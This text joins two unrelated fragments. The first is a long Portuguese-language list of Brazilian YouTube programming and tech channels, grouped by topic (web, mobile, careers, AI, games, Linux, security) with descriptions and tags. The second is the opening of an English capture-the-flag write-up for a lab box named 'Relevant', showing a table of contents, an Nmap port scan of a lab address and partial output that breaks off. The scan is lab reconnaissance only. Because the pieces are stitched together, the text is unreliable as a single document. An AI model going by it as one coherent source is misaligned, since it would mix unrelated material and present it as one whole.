- [JWDev Treinamentos](https://www.youtube.com/channel/UC-nuC9rI-GnfdWubIzN7FRA) - O canal que fala sobre tecnologia de uma forma diferente, sem essa de Hello World! Aqui vamos sempre usar das ferramentas de desenvolvimento para recriar de forma inusitada programas consagrados. _Tags: `javascript`, `games`, `layouts`, `css`, `typescript`, `react`, `angular`, `node.js`, `rxjs`_
- [Keven Jesus](https://www.youtube.com/channel/UCn2jh8rvEePP9s61z-H1P1w) - Canal do instrutor de programação Keven Jesus, com um bom material para quem está iniciando em JavaScript. _Tags: `javascript`, `bootstrap`_
- [Mateus Fernandes](https://www.youtube.com/channel/UCK4uy3QaoEFQ7DLWR-Ih-gg) - O canal do Mateus Fernades e focado na aprendizagem do mundo Front-End com javascript. _Tags: `node`, `react`, `react-redux`_
- [Node Studio Treinamentos](https://www.youtube.com/channel/UCZZ0NTtOgsLIT4Skr6GUpAw) - Cursos completos de Desenvolvimento Web. 100% vídeo aulas, acesso ilimitado e aprendizado garantido. _Tags: `php`, `css`, `html`_
- [Origamid](https://www.youtube.com.br/user/origamidlabs) - Canal focado em desenvolvimento web e web design. _Tags: `javascript`, `vue`, `html`, `css`, `adobexd`_
- [Programador a Bordo](https://www.youtube.com/channel/UC5fWvbBnaFAi2hJlHRmg5kw/videos?&ab_channel=ProgramadoraBordo)- O canal tem foco em desenvolvimento web e em todo o seu universo, desde técnico ao mercado de trabalho. _Tags: `javascript`, `html`, `css`_
- [Programador BR](https://www.youtube.com/channel/UCrdgeUeCll2QKmqmihIgKBQ) - Um canal para programadores e aspirantes a programadores. _Tags: `javascript`, `html`, `css`, `carreira em ti`, `entrevistas`_
- [Rocketseat](https://www.youtube.com/channel/UCSfwM5u0Kce6Cce8_S72olg) - O canal da Rocketseat tá lotado de conteúdo para pessoas desenvolvedoras e ainda tem apoio da plataforma com vários conteúdos de programação gratuitos. _Tags: `javascript`, `react`, `react native`_
- [Rodrigo Branas](https://www.youtube.com/user/rodrigobranas/) - O canal é apresentado por Rodrigo Branas. Arquiteto de software, especialista no desenvolvimento de aplicações web há mais de 15 anos, autor do livro AngularJS Essentials (editora PacktPub) e de diversos artigos da revista Java Magazine. Canal com foco em JavaScript, Angular, Grunt, Bower, Jasmine e outros tópicos. _Tags: `javascript`, `angularjs`, `bower`_
- [TekZoom](https://www.youtube.com/user/tekzoom/) - O TekZoom é um projeto criado e mantido por Reinaldo Silotto. Nosso conteúdo é voltado para profissionais e estudantes de Tecnologia. Aqui no Canal você encontrará o que existe de mais moderno para criação de sites, blogs, redes sociais e lojas online. _Tags: `php`, `javascript`, `node`, `vuejs`, `css`_
- [Webdesign em Foco](https://www.youtube.com/channel/UCL-mk7btv-dHI5hY2Tl1GHg) - Canal focado no Desenvolvimento Web. _Tags: `javascript`,`html`, `css`, `php`, `react`, `bootstrap`_
- [Webschool.io](https://www.youtube.com/c/webschool-io) - Canal focado em desenvolvimento web, abordando muito javascript, css, vue, node, git, programação funcional e muito mais. _Tags: `javascript`,`node`,`angular`,`vue`,`es6`, `saas`,`css`, `git`_
- [William Justen Cursos](https://www.youtube.com/channel/UCa12brLWzCqnxN0KOyjfmJQ) - Um Screencast focado em Desenvolvimento Web, abordando assuntos como HTML, CSS, JS, SVG, React, Canvas, Acessibilidade e muito mais, com cursos ministrados pelo William Justen. _Tags: `javascript`,`html`, `css`, `svg`,`react`, `canvas`_
- [Wouerner](https://www.youtube.com/user/wouerner) - Canal do *Wouerner* falando sobre Javascript com foco no VueJS e um pouquinho de PHP. _Tags:`javascript`,`vuejs`,`php`_
- [WTricks](https://www.youtube.com/channel/UCA97Pg29SezvcPIGsRHC8ew) - De web design à desenvolvimento, aqui você encontra de tudo em videos didáticos e incriveis. _Tags `carreira em ti`, `entrevistas`_
### Desenvolvimento Mobile Nativo & Híbrido 📱
- [CODEficando](https://www.youtube.com/channel/UC1duiHpWq191tlnMk3mSPNA) - Canal que mostra dicas sobre desenvolvimento de aplicativos para os sistemas Android e iOS. Além de outras linguagens de programação como Python e Java. _Tags: `python`, `android`, `java`_
- [Fábrica de Código](https://www.youtube.com/channel/UCXepHP9GmUtF73xtEIa9RWA) - Canal com foco em desenvolvimento híbrido usando Ionic e desenvolvimento web. _Tags: `angular`, `typescript`, `ionic`, `firebase`_
- [Filipe Alves](https://www.youtube.com/channel/UCv6aZVQz8IHrhgemxZrNRmQ) - Canal com tutoriais de desenvolvimento de jogos e dicas de cursos de graduação em computação. _Tags: `javascript`, `desenvolvimento de jogos`, `android`, `c`, `swift`_
- [Flutterando](https://www.youtube.com/user/jacobaraujo7) - Canal com foco em desenvolvimento mobile com flutter. _Tags: `flutter`,`mobile`, `android`, `ios`_
- [Full Stack Developer](https://www.youtube.com/channel/UC-8goXO6sjFuIbanvBd-jfA/featured) - Canal com foco em desenvolvimento mobile híbrido com Ionic. _Tags: `ionic`,`mobile`_
- [Hugo Vasconcelos](https://www.youtube.com/user/tutoriais01) - 135 cursos, todos ministrados por Hugo Vasconcelos, em nosso canal sempre é disponibilizado os cursos básicos e diversas vídeo aulas sobre desenvolvimento todos os dias. _Tags: `c#`, `vb.net`, `sql`, `android`, `java`, `bootstrap`_
- [Loiane Groner](https://www.youtube.com/user/Loianeg) - O canal da nossa Deusa da programação é repleto de conteúdos técnicos, desde suas palestras até cursos gratuitos (como o de Angular que está em andamento). _Tags: `java`, `javascript`, `angular`, `typescript`, `ionic`_
- [Marcelo Simões](https://www.youtube.com/user/mhgs11) - Canal focado em desenvolvimento em Swift. _Tags: `swift`, `ios`_
- [Renato Mota](https://www.youtube.com/channel/UCd-vLa_qcKve3CsDFlYiygA) - Focado em Desenvolvimento Mobile, e show room de novas tecnologias, focado em Ui e Ux. _Tags: `flutter`, `ui`, `ux`_
- [Thiago Aguiar](https://www.youtube.com/user/empreendedormobile) - Canal focado em desenvolvimento iOS e Android. Que ajuda programadores comuns a se tornarem desenvolvedores Android extraordinários. _Tags: `swift`, `ios`,`android`,`kotlin`,`java`_
- [Vinicius Thiengo](https://www.youtube.com/user/thiengoCalopsita) - Vídeos sobre Desenvolvimento Web, Desenvolvimento Android, Avaliação de Sites e Tutoriais de técnicas importantes para desenvolvedores. _Tags: `java`,`android`_
### Entrevista, Webinars & Dicas 📣
- [Alura](https://www.youtube.com/user/aluracursosonline) - No canal da Alura você encontra conversas incríveis com profissionais diversos de tecnologia falando tudo o que você gostaria de saber sobre a área (ou quase tudo). _Tags: `entrevistas`, `palestras`, `programaçao em geral`, `soft skills`, `back-end`, `front-end`, `mobile`_
- [Arquiteto das Galáxias](https://www.youtube.com/c/ArquitetodasGal%C3%A1xias) - Canal do arquiteto de software Lucas Gertel, que compartilha conhecimento, experiências e dicas para se destacar no mercado. Fala sobre arquitetura e desenvolvimento de software. _Tags: `ddd`, `design patterns`, `padrões de arquitetura`, `system design`_
- [Attekita Dev](https://www.youtube.com/c/AttekitaDev) - Canal da Bullas Attekita, Desenvolvedora de software entusiasta em UX. Aborda dicas de carreira, freelancer, desenvolvimento de apps e games. _Tags: `freelancer`, `games`, `mobile`, `UX`_
- [BrazilJS](https://www.youtube.com/user/BrazilJS) - Provavelmente você já conhece o evento BrazilJS, certo? Agora imagina um canal que tem todas as palestras que rolam no maior evento de JavaScript do mundo e videos semanais com as novidades do mundo da tecnologia, corre e ativa o sininho. _Tags: `javascript`, `entrevistas`, `palestras`, `programaçao em geral`, `soft skills`, `back-end`, `front-end`, `mobile`_
- [Canal Dev Samurai](https://www.youtube.com/channel/UC-lHCBqKEtnXA0SBtdOP0bw) - Canal do Felipe Fontoura, desenvolvedor, que dá dicas sobre desenvolvimento e carreira em TI. _Tags: `soft skills`, `carreira em ti`_
- [Código Fonte TV](https://www.youtube.com/user/codigofontetv) - Canal bem divertido com diversos vídeos relacionados ao mundo do desenvolvimento, apresentados pelo Gabriel e sua esposa Vanessa, ambos desenvolvedores. _Tags: `carreira em ti`_
- [Computação sem Caô](https://www.youtube.com/channel/UCaBOUYQGTZgIdMTXtZTosRQ) - O Computação sem Caô é um projeto que busca democratizar o entendimento da ciência da computação no Brasil, realizado pelo Olabi e apresentado por Ana Carolina da Hora, cientista da computação em formação pela PUC-RJ e moradora de Caxias, na Baixada Fluminense. _Tags: `carreira em ti`_
- [Curso De Python - Bruno Rocha](https://www.youtube.com/user/brunovegan/) - A proposta do canal é criar videos rápidos e direto ao assunto com dicas de Python e desenvolvimento web, os videos são apresentados por Bruno Rocha, Engenheiro de Software da Red Hat e membro da Python Software Foundation. _Tags: `python`, `entrevistas`_
- [DesenvolvendoMe](https://www.youtube.com/desenvolvendome) - Canal focado em Soft Skill e Hard Skill para que programadores se destaquem rapidamente na carreira de TI sem paixão por tecnologia. _Tags: - `ruby`, `javascript`, `soft skill`, `mentalidade`, `produtividade`, `entrevista` e `carreira de ti`_
- [DevMedia](https://www.youtube.com/channel/UClBrpNsTEFLbZDDMW1xiOaQ) - A DevMedia é um portal de conhecimento voltado para programadores, com milhares de artigos, dicas, cursos online e videoaulas sobre diferentes áreas de desenvolvimento de tecnologia. _Tags: `carreira em ti`_
- [DevNaEstrada](https://www.youtube.com/channel/UCtIygB7LtILSFWR0kxtZC-A) - Já famoso por seu maravilhoso [podcast](https://devnaestrada.com.br/), o Dev Na Estrada, ou DNE para os mais íntimos, trata sobre diversos assuntos relacionados a desenvolvimento, porém não fica restrito somente a códigos, porém a lições de vida, inspiração e dicas sobre o mundo do desenvolvimento. _Tags: `carreira em ti`, `entrevistas`_
- [Devs Java Girl](https://www.youtube.com/channel/UCgoGOLleKmM9ikxQhGhhOhQ/featured) - O canal ainda está se desenvolvendo, mas essa é uma comunidade que tem crescido bastante em participantes e conteúdos no mundo Java ultimamente, se você gosta de java, recomendo dar uma olhada. _Tags: `java`_
- [Digitalmente](https://www.youtube.com/channel/UCklJJvb043h5KB7kZ2-tO3Q/featured) - O digital[mente] é uma série [quase] semanal de vídeo ensaios que realiza a convergência de temas-chave para a reflexão e compreensão do nosso futuro próximo. Tecnologia, cibercultura, comunicação, ciberativismo etc. _Tags: `carreira em ti`_
- [Fabio Akita](https://www.youtube.com/user/AkitaOnRails) - Canal aborda a experiência pessoal do Fabio Akita, que trabalha na área há décadas, sua visão sobre linguagens, metodologias de estudo, questões sobre a área em geral e Blockchain. _Tags: `ruby on rails`, `carreira em ti`_
- [Fernanda Bernardo](https://www.youtube.com/user/nandinhabernardo) - O canal da Fernanda Bernardo está começando com uma série maravilhosa sobre comunicação, onde os assuntos que são tratados lá no @Help4Papers estão se tornando ótimos videos. Se você quer palestrar ou aprender a se comunicar melhor, assina agora o canal. _Tags: `carreira em ti`_
- [Ferreira Studios](https://www.youtube.com/channel/UCztMwfGqsnPeGat7Np-bFKg) - Canal de desenvolvimento web, dicas e métodos sobre design e ferramentas criativas, do designer gráfico e desenvolvedor Leonardo Ferreira. _Tags: `design`_
- [Filipe Deschamps](https://www.youtube.com/channel/UCU5JicSrEM5A63jkJ2QvGYw) - O lema do canal descreve bem o que o Filipe quer nos apresentar com seu conteúdo. Como diz a descrição: programação vai muito além da sintaxe. _Tags: `entrevistas`_
- [Full Cycle](https://www.youtube.com/channel/UCMUoZehUZBhLb8XaTc8TQrA) - Vídeos sobre as melhores práticas de desenvolvimento de software com o objetivo de ajudar desenvolvedores a se tornarem FullCycle com estudos sobre o mundo dos Microserviços. _Tags: `linux`, `devops`, `docker`, `kubernetes`_
- [Hackers House BR](https://www.youtube.com/channel/UCh1xOy7SP_KyRn4wTNVvFHw) - Aqui, rolam palestras em lives com pessoas incríveis da TI e com todo o tipo de conteúdo. Vale o play. _Tags: `docker`, `infra`, `back-end`, `front-end`, `carreira em ti`_
- [Harlley Oliveira](https://www.youtube.com/channel/UCTJ1mLre8sT-d4KuvmQsSQA) - Canal sobre tecnologias, programação e dicas sobre a área de TI. _Tags: `carreira em ti`_
- [Henrique Bastos](https://www.youtube.com/user/henriquebastosnet) - Muito conteúdo e dicas relacionadas ao mundo da programação, lives no estilo bate-papo com o Henrique e vários outros profissionais com muitos conhecimentos e experiências. _Tags: `python`, `django`, `carreira em ti`_
- [IlustraDev](https://youtube.com/ilustradev) - Canal de vídeos ilustrativos sobre o mundo da programação, dicas e carreira. Possui conteúdo de vários temas como back-end, front-end, games, mobile, segurança da informação, e várias curiosidades da área. _Tags: `carreira em ti`, `back-end`, `front-end`_
- [InfoQ Brasil](https://www.youtube.com/c/InfoQBrasil) - Canal de vídeos do site [InfoQ Brasil](https://www.infoq.com/br) contendo palestras de diversos eventos que ocorrem pelo Brasil, tais como [QCon São Paulo](https://qconsp.com), [The Conf](https://www.theconf.club/) e [PAPis](https://www.papis.io/). _Tags `carreira em ti`, `entrevistas`_
- [Laboratório da Julia](https://www.youtube.com/channel/UChfu9xWITOvsXYLKm7hieSQ) - Canal da Julia, uma estudante de Engenharia da computação, onde compartilha videos sobre o seu dia na faculdade e seus projetos. _Tags `carreira em ti`, `entrevistas`_
- [Leandro Bighetti](https://www.youtube.com/channel/UCKN63lTXUgCSjR5gPNDUjmw) - O Leandro Bighetti mora na Alemanha e compartilha tudo sobre como é ser desenvolvedor fora do país, como se virar com idiomas, linguagens utilizadas e várias dicas foda. Vai lá e não perde essa chance. _Tags `carreira em ti`, `entrevistas`_
- [Lucas Montano](https://www.youtube.com/lucasmontano) - Especialista em desenvolvimento mobile com projetos que alcançaram + 1 Milhão de usuários. Lucas aborda assuntos como: carreira na tecnologia e como tirar ideias do papel (perspectiva do programador). _Tags: `carreira em ti`, `empreendedorismo`, `mobile`_
- [Moacir Moda](https://www.youtube.com/channel/UCex749toAZQyjOE-607e27g) - Canal do Moacir Moda, desenvolvedor e fundador da Codevance. Da dicas sobre negócios, desenvolvimento pessoal e carreira em TI. _Tags: `soft skills`, `carreira em ti`, `empreendedorismo`_
- [O Bruno Germano](https://www.youtube.com/channel/UCBWbWViVqDHckknir8PIIdg) - No canal do Bruno, rola video toda semana com review de produtos, toques de carreira, opiniões etc. _Tags `carreira em ti`, `entrevista`_
- [Pagar.me Talks](https://www.youtube.com/channel/UCNhSCufrcOMeFvzEM7tt9Lw) - Um canal que apresenta várias palestras feitas pela equipe do Pagar.me. _Tags `carreira em ti`, `entrevistas`_
- [Papo Binário](https://www.youtube.com/channel/UCuQ8zW9VmVyml7KytSqJDzg) - O canal é um projeto da Mente Binária sobre tecnologia da informação com o objetivo de integrar profissionais de TI, explorar projetos colaborativos e contribuir para a difusão de conhecimento através de discussões, tutoriais e entrevistas com grandes nomes da área. _Tags: `c`, `python`, `carreira em ti`, `entrevistas`_
- [Peixe Babel](https://www.youtube.com/user/CanalPeixeBabel) - O canal onde ciência e tecnologia se encontram lindamente em videos semanais e alguns encontros em BH no Chopp comCiência. _Tags `carreira em ti`, `entrevistas`_
- [PHPSP](https://www.youtube.com/user/phpsp1) - Canal feito pela comunidade do PHPSP, onde é possível encontrar vários Hangouts e palestras com dicas valiosas para quem programa PHP. _Tags: `php`, `carreira em ti`, `entrevistas`_
- [Pizza de Dados](https://www.youtube.com/channel/UCqOX4hl_9DJ5Zmzh8MpgL9A) - Podcasts sobre desenvolvimento. _Tags: `podcast` `carreira em ti`, `entrevistas`_
- [Professor Isidro](https://www.youtube.com/user/fmassetto) - Canal do professor universitário Isidro, onde é disponibilizado bastante conteúdo sobre estrutura de dados, programação, banco de dados e muito mais. _Tags `carreira em ti`, `entrevistas`_
- [Programa aí!](https://www.youtube.com/channel/UCPKu2Zp7kvKyGGud876DAoA) - Canal do [Rodolfo Carvalho](https://github.com/rscarvalho) dedicado ao compartilhamento de conhecimento! Desenvolvimento de software, Big Data, DevOps e outras coisas interessantes. _Tags:`programaçao em geral`, `big data`, `devops`_
- [Programador Sagaz](https://www.youtube.com/channel/UCaqc3TH-ZdPw7OTIlndvSgQ) - Dicas, tutoriais e notícias sobre o mundo da programação. Vídeos para programadores, feitos pelo programador Weuler Borges. _Tags:`python`, `carreira em ti`, `entrevistas`_
- [Ramon Durães](https://www.youtube.com/user/ramonduraes) - Nesse canal Ramon Durães compartilha a sua experiência ao longo dos últimos 20 anos desenvolvendo software. Você pode acompanhar vídeos relacionados a estratégia moderna para o desenvolvimento de software, serviços de nuvem, gestão de aplicações, arquitetura de software, carreira, gestão de pessoas,serviços, cloud, mobilidade, ALM, DevOps. _Tags:`carreira em ti`, `gestão de pessoas`, `entrevistas`, `cloud`, `DevOps`_
- [Sou Java](https://www.youtube.com/channel/UCH0qj1HFZ9jy0w87YfMSA7w) - Muito conteúdo e dicas relacionadas ao mundo da JVM, falando muito sobre JDK, Spring, Jakarta EE e por aí vai. _Tags: `java` `carreira em ti`, `entrevistas`_
- [The Velopers](https://www.youtube.com/channel/UC4VqseCpRctjC7Di6c5Bh5Q) - Nosso querido Pokemaobr vulgo Rodrigo Cardoso agora em um talk show cheio de humor, pessoas fodas e muito conteúdo. Não dá pra perder né. _Tags `carreira em ti`, `entrevistas`_
- [Training Center](https://www.youtube.com/channel/UC8reCbWAXloUaFmHhsOh2Xw) - No TC você encontra uma galera incrível, disposta a compartilhar seus conhecimentos técnicos e soft skills, além de ser um espaço aberto para todas as pessoas poderem compartilhar o que sabem. _Tags `carreira em ti`, `entrevistas`_
- [TreinaWeb](https://www.youtube.com/user/TreinaWeb) - Canal de uma das principais escolas especializadas em cursos online de programação web, desktop, mobile e edição de foto e vídeo no Brasil com várias dicas. _Tags: `dicas`, `diversos`, `soft skills`, `back-end`, `front-end`, `mobile`_
- [Universo Discreto](https://www.youtube.com/channel/UCEn6kONg6EC_Ylh0RlInsMw) - Canal criado pelo Lucas Latarri, professor do IF Sudeste MG - Rio Pomba. Contém videoaulas e conteúdo em geral sobre Ciência da Computação. _Tags: `deep learning`, `inteligência artificial`, `carreira em ti`, `entrevistas`, `diversos`_
- [UXNOW](https://www.youtube.com/channel/UCgfaifzmqadwKyCd0lagylQ) - No canal UXNOW você aprende tudo sobre Design, UI e UX em videos curtos, lives e até uma playlist com curso de UX gratuito. _Tags: `design`, `carreira em ti`, `entrevistas`_
- [Vida de Programador](https://www.youtube.com/channel/UCW4XS1NWmwOKWA1rmfgmyHQ) - Canal de vídeos do mesmo criador do Vida de Programador, sobre desenvolviemento e outros assuntos variados. _Tags `carreira em ti`, `entrevistas`_
- [Vue.js Brasil](https://www.youtube.com/channel/UC9DvZyV1QU3Y0-Tpv97oAxw) - Canal focado em Vue.js e JavaScript que conta com hangouts semanais sobre temas diversos no universo front-end e vídeos com dicas de desenvolvimento. _Tags: `javascript`,`vuejs`_
- [William Oliveira](https://www.youtube.com/channel/UCWrqsnPLl6aRX0ECUmPaZEw) - Com o Will você aprender tudo o que gostaria de saber sobre desenvolvimento de software e não tinha a quem perguntar. Rolam videos, lives, tudo sem firula e startupismo. E ah, já tem video lá falando do salário de pessoas programadoras, então corre e não esquece do like. _Tags `carreira em ti`, `entrevistas`_
- [WoMakersCode](https://www.youtube.com/womakerscode) - Iniciativa sem fins lucrativos para incentivar mulheres na TI, o WoMakersCode também possui um canal no YouTube com palestras e webinars principalmente sobre front-end e carreira. _Tags: `carreira em ti`, `html`, `css`, `javascript`, `front-end`_
### Infraestrutura 🖧
- [Canal do Eriberto Mota](https://www.youtube.com/user/eribertomota) - Canal do Debian Developer Eriberto Mota, onde aborda assuntos de Redes e Software Livre. _Tags: `linux`, `redes`, `internet`, `docker`_
- [Canal do Paulo Kretcheu](https://www.youtube.com/user/kretcheu2001) - Canal do entusiasta de Software Livre Paulo Kretcheu, onde levanta tópicos sobre Internet, Software Livre e outros tópicos relacionados. _Tags: `linux`, `redes`, `internet`_
- [Eu faço a internet funcionar](https://www.youtube.com/channel/UCMsyeaScaqxDLmIGhTfSoNA) - Um canal que apresenta como a internet realmente funciona para além (e muitas vezes contra) o senso comum. _Tags: `internet`_
- [Getup Cloud](https://www.youtube.com/getupcloud) - Dicas sobre cloud e Kubernetes. _Tags: `devops`, `docker`, `kubernetes`_
- [NIC.br Videos](https://www.youtube.com/channel/UCscVLgae-2f9baEXhVbM1ng) - Canal oficial do NIC.br - Núcleo de Informação e Coordenação do Ponto BR, organização responsável prinicpalmente pelo registro.br, pelo cgi.br (Comitê Gestor da Internet no Brasil) e pelo IX.br - Pontos de troca de trafego brasileiros. O canal concentra as apresentações dos eventos do NIC onde divulgam-se tutoriais, discussões técnicas e políticas envolvendo a infraestrutura de internet Brasileira. _Tags: `internet`, `nic.br`, `dominios`, `redes`, `regulamentação`_
### Inteligência Artificial 🤖
- [Brincando com Ideias](https://www.youtube.com/channel/UCcGk83PAQ5aGR7IVlD_cBaw) - Canal com foco em desenvolvimento em IOT. _Tags: `python`, `arduino`, `raspberry pi`_
- [Canal Sandeco](https://www.youtube.com/channel/UCIQne9yW4TvCCNYQLszfXCQ) - O objetivo do canal é mostrar como desenvolver aplicações de Data Science, Aprendizagem de Máquina (machine Learning) utilizando grandes massas de dados contidos em armazenamentos Big Data, tudo isso de forma bem humorada. _Tags: `inteligência artifical`, `deep learning`, `data science`_
- [Canal TI](https://www.youtube.com/channel/UCEQ-nGDGFupHyta90z6hVNQ) - O Canal TI produz vídeos relacionados a Tecnologia da Informação em geral. _Tags: `inteligência artificial`, `php`, `arquitetura da informação`_
- [Didática Tech](https://www.youtube.com/channel/UC0BiVs5EYh57gzGVvhddjsA) - O Canal aborda temas relacionados à inteligência artificial, aprendizagem de máquina (machine learning), ciência de dados, matemática, programação e outros assuntos ligados à tecnologia. _Tags: `aprendizagem de máquina`, `ciência de dados`, `inteligência artificial`, `matemática`_
- [ML4U](https://www.youtube.com/channel/UCMSGXqLEE1q5NqG3hjA5vCg/) - Canal criado pelo professor Rodrigo Mello, onde ele aborda algoritmos de Aprendizado de Máquina, Ciência de Dados e Inteligência Artificial, explicando desde a teoria à prática. _Tags: `aprendizagem de máquina`,`deep learning`, `data science`, `carreira em ti`, `entrevistas`_
- [O programador](https://www.youtube.com/channel/UCa4Dj04ABMCxBUJ_aWTP9Bg) - Conselhos, dicas e truques para o dia a dia do desenvolvedor de software. _Tags `carreira em ti`, `entrevistas`_
- [Universo Programado](https://www.youtube.com/channel/UCf_kacKyoRRUP0nM3obzFbg) - O Universo Programado é um canal com foco em inteligência artificial, mostrando a IA jogando joguinhos clássicos e explicando-a. _Tags: `inteligência artificial`_
### Games :video_game:
- [Davifo](https://www.youtube.com/channel/UCLKmrL8UuRczNPkr7VzW1ow/featured) - Canal com foco em desenvolvimento e monetização de jogos, abordando diversos assuntos que envolve não só o desenvolvimento como também estratégias para ganhos com produtos desenvolvidos. _Tags: `c#`, `unity 2D`, `unity 3D `, `desenvolvimento de jogos`, `entrevistas`, `carreira em ti`_
- [GamesIndie - Tutoriais de Unity & Programação](https://www.youtube.com/user/GamesIndie/featured) - Canal do Bruno, sobre tutoriais com foco em pessoas iniciantes no mundo do desenvolvimento de jogos 2D e 3D usando a Unity engine. _Tags: `c#`, `unity 2D`, `unity 3D `, `desenvolvimento de jogos`_
- [Gus Game Dev](https://www.youtube.com/channel/UCoxRNjIDKlzxxl8OOJub6CA) - Canal de tutoriais de desenvolvimento de jogos 2D em Godot, Unity e Construct. _Tags: `unit 2D`, `Construct`, `Godot`_
- [Marcos Schultz](https://www.youtube.com/channel/UCsXIdvfp138xs1K1eTsaezQ) - Canal que aborda diversos tutoriais relacionado ao desenvolvimento usando C# e Unity3D, Possui um fórum para todos que desejarem compartilhar ou solucionar dúvidas relacionadas ao desenvolvimento na Unity3D e assuntos correlato ao mundo dos jogos. _Tags: `c#`, `unity 3D `, `desenvolvimento de jogos`_
- [Paulo (We make a game)](https://www.youtube.com/user/wemakeagame) - Canal voltado a criação de jogos autorais e tutoriais de desenvolvimento, nas palavras do criador, também conhecido como Paulo: "Esse canal é destinado a comunidade de desenvolvedores de jogos, aprenda, compartilhe e complemente". _Tags: `c#`, `unity 3D`, `desenvolvimento de jogos`_
- [PRX 3D - Praxinoscopio](https://www.youtube.com/user/praxinoscopio3d) - Canal com foco em marketing digital, modelagem 3d e tutoriais de desenvolvimento de jogos com unity. _Tags: `c#`, `unity 3D`, `desenvolvimento de jogos`_
- [Uniday Studio](https://www.youtube.com/c/UnidayStudio) - Canal com foco em desenvolvimento de jogos digitais, ensinando todo o passo a passo de como criar um jogo completo. _Tags: `upbge`, `python`, `desenvolvimento de jogos`, `blender`_
### Linux :penguin:
- [Diolinux](https://www.youtube.com/channel/UCEf5U1dB5a2e2S-XUlnhxSA) - O canal Diolinux tem como objetivo apresentar o mundo Linux e open-source na forma que qualquer pessoa possa consumir. Você encontrará como principais conteúdos: Aprender o uso de ferramentas linux/open-source e review de Distros Linux. _Tags: `linux`, `open-source`, `reviews`_
- [LinuxTips](https://www.youtube.com/linuxtips) - Dicas interessantes sobre Linux, Docker, Cloud e DevOps. _Tags: `linux`, `devops`, `docker`, `kubernetes`_
- [Mateus Muller](https://www.youtube.com/channel/UCeLm2Lzs0-CBsgiEyGXXI8g) - Canal que incentiva a cultura open-source por meios de vídeos didáticos sobre diversos assuntos, sendo eles Linux, programação, redes, carreira, segurança e muito mais. _Tags: `linux`, `open-source`, `infraestrutura`, `devops`_
- [MicroHobby](https://www.youtube.com/channel/UC431MbbedNKuIuDBPeSCdyg) - Canal de um cientista da computação que atua na area de sistemas embarcados e colaborador do kernel Linux, no canal você encontrará videos sobre linux da perspectiva do mundo de embarcados. _Tags: `linux`, `sistemas embarcados`, `hardware`_
- [Slackjeff](https://www.youtube.com/channel/UClz3DneoYlccluy4hBlx86Q) - Slackjeff é um canal para amantes de tecnologias como Software Livre, Open-source, GNU/Linux e programação. _Tags: `linux`, `open-source`_
### Lógica de Programacao
- [All Electronics](https://www.youtube.com/user/AllEletronicsGR/playlists) - Vai encontrar playlists de lógica booleana, portas lógicas, circuitos lógicos e também tem um curso básico de arduino. E muitos outros vídeos voltados para lógica e eletrônica. _Tags: `arduino`, `portas lógicas`, `hardware`, `FPGA`, `VHDL`, `eletrônica`_
- [Canal do Código](https://www.youtube.com/channel/UCvtP8QFmYE9zpDrxxhFEwTg/playlists) - O Canal do Código possui alguns cursos sobre estruturas de dados e lógica de programação, focado em resolução de problemas e Java. _Tags: `java`, `lógica de programacao`_
- [RBtech](https://www.youtube.com/user/RBTechinfo) - Canal onde você encontra aulas e cursos sobre hardware, desenvolvimento web, design e criação. Cursos de lógica de programação, PHP, Android, HTML e CSS, JavaScript, Git e muito mais. _Tags: `javascript`, `html`, `css`, `carreira em ti`, `arduino`_
- [Zurubabel](https://www.youtube.com/channel/UCqWo_iZvIALqgmXkzJ8S0Sg) - De JavaScript a lógica proposicional, de Java a estatística, esse canal possui dezenas de cursos completos. _Tags:`java`, `inteligência artificial`, `hardware`, `unity`, `css`, `html`, `javascript`, `python`_
### Segurança 🔐
- [Bóson Treinamentos](https://www.youtube.com/user/bosontreinamentos/playlists?flow=grid&view=1) - Fábio dos Reis e a Bóson Treinamentos em Tecnologia criam cursos em vídeo de forma gratuita, com o intuito de disseminar conhecimento para o maior número de pessoas possível, com qualidade e facilidade de acesso. _Tags: `redes`, `base de dados`, `html`, `css`, `java`, `uml`, `php`, `python`, `sql`, `android`, `linux`, `javascript`_
- [Cássio Batista Pereira](https://www.youtube.com/channel/UCTgINI4jGp9XRsh0AfWA1fg) - Aqui você curte os vídeos com diversas técnicas de segurança em código, diversas estratégias para implementar segurança em software, sacadas do mundo DevSecOps e AppSec em geral com foco em analistas e programadores, arquitetos e afins. _Tags: `appsec`,`cyber security`,`devsecops`,`seguranca da informação`,`sdlc`_
- [CaveiraTech](https://www.youtube.com/caveiratech2) - Canal focado em segurança da informação, hacking e programação, onde Guilherme Junqueira ministra cursos gratuitos de python e segurança da informação, além de dicas e vlogs sobre TI. _Tags: `seguranca da informação`, `seguranca e hacking`, `nodejs`, `testes`, `sql`, `azure`, `docker`_
- [Daniel Donda](https://www.youtube.com/user/DanielDonda) - Dicas sobre tecnologia, administração de redes, carreiras e certificação, hacking, segurança da informação e muito mais. _Tags: `seguranca da informação`, `cyber security`, `pentest`_
- [diofeher](https://www.youtube.com/channel/UCOCOSHBTtaFEJYzlYjo8Zlw) - Dicas sobre tecnologia, desenvolvimento, trabalho remoto e segurança da informação. _Tags: `seguranca da informação`, `cyber security`, `pentest`, `desenvolvimento`, `python`, `javascript`_
- [Fábrica de Noobs](https://www.youtube.com/channel/UCGObNjkNjo1OUPLlm8BTb3A/playlists) - Canal fala sobre computação forense, segurança da informação, desafios hackers e muitos outros vídeos sobre computação e temas diversos. _Tags:`seguranca da informação`, `cyber security`, `computação forense`, `hacking`_
- [Gabriel Pato](https://www.youtube.com/channel/UC70YG2WHVxlOJRng4v-CIFQ) - Canal focado em segurança da informação, segurança ofensiva, pentest, técnicas de ataques, dicas de segurança. _Tags: `seguranca da informação`_
- [Xtreme Security](https://www.youtube.com/user/daybsonbruno) - Canal focado em compartilhar conhecimento entre os profissionais de Segurança da Informação incentivando estudantes e entusiastas da área. _Tags: `seguranca da informação`_
|
# Relevant
## Table of Contents
* [Enumerate](#enumerate)
* [Ports](#ports)
* [Services](#services)
* [Operating System](#operating-system)
* [Web Browsing](#web-browsing)
* [Web Crawling](#web-crawling)
* [SMB Browsing](#smb-browsing)
* [Vulnerability Scanning](#vulnerability-scanning)
* [Exploit](#exploit)
* [Explore](#explore)
* [Escalate](#escalate)
## Enumerate
### Ports
An initial Nmap port scan discovered TCP ports 80, 135, 445, 139, 445, and 3389 were open.
```bash
sudo nmap 10.10.225.154 -sS -sU --min-rate 1000 -oA relevant-open-ports-initial
# output
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:21 MDT
Nmap scan report for 10.10.225.154
Host is up (0.23s latency).
Not shown: 1000 open|filtered ports, 995 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
